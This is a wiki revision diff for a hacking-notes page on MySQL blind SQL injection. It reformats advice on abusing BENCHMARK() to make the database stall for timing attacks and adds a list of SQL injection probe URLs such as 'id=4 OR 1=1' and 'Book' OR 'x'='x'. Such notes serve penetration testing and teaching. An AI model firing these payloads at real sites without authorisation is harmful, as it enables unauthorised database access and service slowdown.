Differences

This shows you the differences between two versions of the page.

--- hacking:sql_injection:mysql:blind_sql_injections [2020/04/16 22:51] – [Making Databases Wait / Sleep For Blind SQL Injection Attacks] peter
+++ hacking:sql_injection:mysql:blind_sql_injections [2020/07/15 09:30] (current) – external edit 127.0.0.1
@@ Line 25: / Line 25: @@
 Be careful while using times more than 20-30 seconds; database API connection or script can be timeout.
-BENCHMARK() (M)
+<code sql>
+BENCHMARK()
+</code>
-Basically, we are abusing this command to make MySQL wait a bit. Be careful you will consume web servers limit so fast!
+Basically, we are abusing this command to make MySQL wait a bit.  Be careful you will consume web servers limit so fast!
 <code sql>
@@ Line 45: / Line 47: @@
 </code>
+----
+===== Clear SQL Injection Tests =====
+These tests are simply good for blind sql injection and silent attacks.
+<code sql>
+product.asp?id=4
+  product.asp?id=5-1
+  product.asp?id=4 OR 1=1
+product.asp?name=Book
+  product.asp?name=Bo'%2b'ok
+  product.asp?name=Bo' || 'ok
+  product.asp?name=Book' OR 'x'='x
+</code>
+----